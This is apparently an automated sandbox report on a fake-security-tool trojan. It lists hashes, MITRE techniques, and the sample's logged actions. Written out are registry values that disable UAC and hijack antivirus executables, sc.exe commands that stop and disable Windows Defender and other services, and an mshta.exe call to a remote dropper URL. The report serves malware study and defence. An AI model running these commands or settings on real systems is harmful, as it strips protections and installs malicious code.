9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

General

Target

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
Size

2.7MB
MD5

25543861ba274d232c398bc842057def
SHA1

72fead8c6e44aade2f1f7df53a59d2258bdbc3d7
SHA256

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
SHA512

03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
SSDEEP

49152:1b2JAKeNCqs5pTNkRLq7J7EzlbCFKmoeBbUkoqypczICPk:1bIAKeNCrtkFMJ7glbqIeBbUZHC

Score

10^/10

evasion persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Protector-hcbi.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-hcbi.exe

Disables taskbar notifications via registry modification
evasion
Executes dropped EXE 1 IoCs

Processes:

Protector-hcbi.exe

pid process

1328 Protector-hcbi.exe

Sets file execution options in registry 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Protector-hcbi.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[4].exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SoftSafeness.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vcsetup.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intdel.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trojantrap3.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utpost.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusutilities.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\optimize.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnotify.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nsupdate.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwinst4.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavproxy.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\popscan.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atguard.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avptc32.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prizesurfer.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wfindv32.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winupdate.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAhlp.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-agnt95.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmavsp.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEShow.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\etrustcipe.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oasrv.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PC_Antispyware2010.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fast.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\normist.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashLogV.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiadmin.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavcl.exe\Debugger = "svchost.exe"	Protector-hcbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe\Debugger = "svchost.exe"	Protector-hcbi.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 2 IoCs

Processes:

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe

pid	process
1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Protector-hcbi.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-hcbi.exe"	Protector-hcbi.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run	Protector-hcbi.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Protector-hcbi.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hcbi.exe

Drops file in System32 directory 3 IoCs

Processes:

Protector-hcbi.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\services.msc	Protector-hcbi.exe
File opened for modification	C:\Windows\SysWOW64\eventvwr.msc	Protector-hcbi.exe
File opened for modification	C:\Windows\SysWOW64\diskmgmt.msc	Protector-hcbi.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1984 sc.exe
1968 sc.exe
272 sc.exe
1700 sc.exe
1120 sc.exe
1032 sc.exe
1508 sc.exe
1072 sc.exe
1312 sc.exe
1928 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1984	sc.exe
1968	sc.exe
272	sc.exe
1700	sc.exe
1120	sc.exe
1032	sc.exe
1508	sc.exe
1072	sc.exe
1312	sc.exe
1928	sc.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exeProtector-hcbi.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	Protector-hcbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1"	Protector-hcbi.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Protector-hcbi.exe

pid	process
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exe

description	pid	process
Token: SeDebugPrivilege	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
Token: SeDebugPrivilege	1328	Protector-hcbi.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Protector-hcbi.exe

pid process

1328 Protector-hcbi.exe
1328 Protector-hcbi.exe
1328 Protector-hcbi.exe
1328 Protector-hcbi.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Protector-hcbi.exe

pid process

1328 Protector-hcbi.exe
1328 Protector-hcbi.exe
1328 Protector-hcbi.exe
1328 Protector-hcbi.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exe

pid	process
1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe
1328	Protector-hcbi.exe

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exe

description	pid	process	target process
PID 1748 wrote to memory of 1328	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	Protector-hcbi.exe
PID 1748 wrote to memory of 1328	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	Protector-hcbi.exe
PID 1748 wrote to memory of 1328	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	Protector-hcbi.exe
PID 1748 wrote to memory of 1328	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	Protector-hcbi.exe
PID 1748 wrote to memory of 1720	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	cmd.exe
PID 1748 wrote to memory of 1720	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	cmd.exe
PID 1748 wrote to memory of 1720	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	cmd.exe
PID 1748 wrote to memory of 1720	1748	9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe	cmd.exe
PID 1328 wrote to memory of 1772	1328	Protector-hcbi.exe	mshta.exe
PID 1328 wrote to memory of 1772	1328	Protector-hcbi.exe	mshta.exe
PID 1328 wrote to memory of 1772	1328	Protector-hcbi.exe	mshta.exe
PID 1328 wrote to memory of 1772	1328	Protector-hcbi.exe	mshta.exe
PID 1328 wrote to memory of 1120	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1120	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1120	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1120	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1032	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1032	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1032	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1032	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1984	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1984	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1984	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1984	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1508	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1508	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1508	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1508	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1968	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1968	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1968	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1968	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1072	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1072	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1072	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1072	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1928	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1928	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1928	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1928	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1312	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1312	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1312	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1312	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 272	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 272	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 272	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 272	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1700	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1700	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1700	1328	Protector-hcbi.exe	sc.exe
PID 1328 wrote to memory of 1700	1328	Protector-hcbi.exe	sc.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

Protector-hcbi.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-hcbi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-hcbi.exe

C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
"C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
2⤵
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1328

C:\Windows\SysWOW64\mshta.exe
mshta.exe "http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1"
3⤵
- Modifies Internet Explorer settings
PID:1772

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
3⤵
- Launches sc.exe
PID:1120

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
3⤵
- Launches sc.exe
PID:1032

C:\Windows\SysWOW64\sc.exe
sc stop msmpsvc
3⤵
- Launches sc.exe
PID:1984

C:\Windows\SysWOW64\sc.exe
sc config msmpsvc start= disabled
3⤵
- Launches sc.exe
PID:1508

C:\Windows\SysWOW64\sc.exe
sc stop AntiVirService
3⤵
- Launches sc.exe
PID:1072

C:\Windows\SysWOW64\sc.exe
sc config ekrn start= disabled
3⤵
- Launches sc.exe
PID:1968

C:\Windows\SysWOW64\sc.exe
sc stop GuardX
3⤵
- Launches sc.exe
PID:272

C:\Windows\SysWOW64\sc.exe
sc config AntiVirSchedulerService start= disabled
3⤵
- Launches sc.exe
PID:1312

C:\Windows\SysWOW64\sc.exe
sc config AntiVirService start= disabled
3⤵
- Launches sc.exe
PID:1928

C:\Windows\SysWOW64\sc.exe
sc config GuardX start= disabled
3⤵
- Launches sc.exe
PID:1700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\954301~1.EXE" >> NUL
2⤵
PID:1720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

2

T1060

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

Impair Defenses

Modify Registry

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
Filesize
2.7MB

MD5
25543861ba274d232c398bc842057def

SHA1
72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

SHA256
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

SHA512
03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

Download Submit
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
Filesize
2.7MB

MD5
25543861ba274d232c398bc842057def

SHA1
72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

SHA256
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

SHA512
03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

Download Submit
\Users\Admin\AppData\Roaming\Protector-hcbi.exe
Filesize
2.7MB

MD5
25543861ba274d232c398bc842057def

SHA1
72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

SHA256
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

SHA512
03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

Download Submit
\Users\Admin\AppData\Roaming\Protector-hcbi.exe
Filesize
2.7MB

MD5
25543861ba274d232c398bc842057def

SHA1
72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

SHA256
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

SHA512
03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

Download Submit
memory/272-85-0x0000000000000000-mapping.dmp

Download
memory/1032-78-0x0000000000000000-mapping.dmp

Download
memory/1072-82-0x0000000000000000-mapping.dmp

Download
memory/1120-77-0x0000000000000000-mapping.dmp

Download
memory/1312-84-0x0000000000000000-mapping.dmp

Download
memory/1328-93-0x00000000052D0000-0x00000000052E0000-memory.dmp

Filesize
64KB

Download
memory/1328-98-0x0000000005930000-0x0000000005942000-memory.dmp

Filesize
72KB

Download
